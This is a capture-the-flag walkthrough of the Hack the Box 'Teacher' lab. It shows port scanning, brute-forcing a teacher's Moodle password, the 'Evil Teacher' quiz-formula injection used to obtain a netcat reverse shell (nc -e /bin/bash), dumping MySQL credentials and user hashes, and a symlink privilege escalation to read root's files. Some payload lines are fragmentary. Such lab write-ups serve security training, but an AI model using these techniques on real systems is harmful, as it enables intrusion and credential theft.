Today we are going to solve another CTF challenge “Teacher”.
It is a retired vulnerable lab presented by Hack the Box for helping pentesters
to perform online penetration testing according to your experience level; they
have a collection of vulnerable labs as challenges, from beginners to Expert
level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they
have a static IP. The IP of Curling is 10.10.10.153
Penetrating
Methodology
Scanning
·
Network Scanning (Nmap)
Enumeration
·
Web Spidering (dirb)
·
Abusing HTTP service
·
Password Fuzzing (Wfuzz)
Exploiting
·
Evil Teacher Attack
·
Obtain Netcat session
·
Get config.php to obtain mysql password
·
Connect to mysql
·
Extract tables to obtain login credentials
·
Get user.txt
Privilege Escalation
·
Sym linking root directory
·
Get root.txt
Walkthrough
Scanning
Let’s start off with our basic Nmap command to find out the
open ports and services.
nmap -sC -sV -p-
10.10.10.153
As you can observe that it shown port 80 is open for http
services.
We found a school website on exploring port 80, and I didn't
find a lot of information here. This website appears to be designed for online
courses and the author may use some educational cms to design it.
Enumeration
Since it is a learning site that needs to be designed for
online classes using a CMS platform. Therefore, I will go for the enumeration
of the web directory without wasting much time.
If you notice the image below, you will find a web directory
/moodle. The website is therefore proven to be designed on MOODLE CMS, let's
explore it further.
When I explored http:/10.10.10.153/moodle, it's the "Giovanni Chhatta" teacher portal
for online classes in Mathematics Algebra. If you're looking for a moodle
exploit, you're going to see it vulnerable to SQL and RCE. So, to exploit it, we
need to log in to this account, but we don’t have credentials.
I felt like photo gallery looks suspicious while spidering
because each row contains 4 tiles and one photo in the top left corner is
missing.
Therefore, I check the source code of the page and there is
some error where I saw picture 5. We need to download this picture to identify
more about the image error.
So, I downloaded this image 5 with the help of the wget
command and identified the type of file.
wget http://10.10.10.153/images/5.png
file 5.png
Though it looks like an image, but it was ASCII file that we
could open in any text editor. As you can see with the help of the cat command,
I opened the 5.png file where I found the "Giovanni" user password
clue.
PASSWORD HINT: “I forgot
the last character of my
password. The only part I remembered is Th4C00lTheacha”
Since the password's last character was missing, I created a
wordlist with the command below.
crunch 15 15 -t
Th4C00lTheacha^ -o pass.txt
Now let use wfuzz for fuzzing brute force using wordlist to
identify valid login combination.
WoW!! We got HTTP 200 ok response for Giovanni: Th4C00lTheacha#
Exploiting
We get inside the dashboard with the help of the above login
credential. Now let's try to exploit, if you're going to google for moodle
exploit then it's going to show you EVIL TEACHER attack which you can read from
here.
We now need to edit a new
activity in order to exploit it, so explore settings > edit > add an activity or resource. Now you're
going to get a prompt to select an activity you want to add, I've chosen quiz
here.
Then click on Ethical hacking quiz to add some question
inside it.
Click on Edit option for adding question.
Now click on Add > +
a new question which will open a console to add quiz question.
Choose “calculated” the
question type to add.
Now, when you ask a question, you need to mention the answer
in the given text area, but this is vulnerable to EVIL TEACHER attack. Now get
the reverse shell we insert a formula in the filed text given to write the
answer and then click on save the changes.
1?>
Start netcat in the local machine and then inject netcat
reverse shell payload in the URL as shown in the image, click on next page:
nc -lvp 1234
&0(data;nc -e
/bin/bash )
Repeat the same to inject nc payload once again and execute
the url to get netcat session.
&0(data;nc -e
/bin/bash )
You can see here that we pwned the target machine's web
shell, let's explore more to get user.txt and root.txt. So, I check the
directory list inside /moodle here that I found a config.php file.
I saw mysql login credential inside the config.php file as
shown below.
Connect to mysql to extract information from the database
such as credentials for system login.
mysql -u root
-p’Welkom1’ moodle
show tables;
Here mdl_user table looks more interesting, let’s extract
its column information in hop to get some useful information.
show columns from
mdl_user;
WOW! WOW!! It includes the username and column of the
password, let's explore it.
select user,password
from mdl_user;
Here I found 4 users with md5 hash value, let's try cracking them.
So, we got password "expelled" by using the online
md5 decryption tool.
Now use the credentials above and switch user account to
try to locate user.txt file.
su Giovanni
password: expelled
ls
cat user.txt
Yeah! Yeah. We got our 1st flag successfully, now let's
find out about root.txt, but as we know it needs an escalation of privilege.
Privilege
Escalation
So, while traversing, I found a backup_course.tar file file
inside /home/giovanni/work/tmp
I found a backup _course.tar file inside /hom /giovanni/work/tmp while traversing.
Therefore, since the current directory has full permission,
I try to link the root directory within the /tmp folder so that we can get
backup of the root directory within the /tmp folder with the help of backup.sh.
ln -s /root tmp
Fantastic!! I found /root directory within /tmp after 1-2
minutes, which means that without root access we can get root.txt file as shown
below.
cd /tmp
ls
cd /root
ls
cat root.txt
Booom!! We found root.txt successfully!!!!!!!!!!!
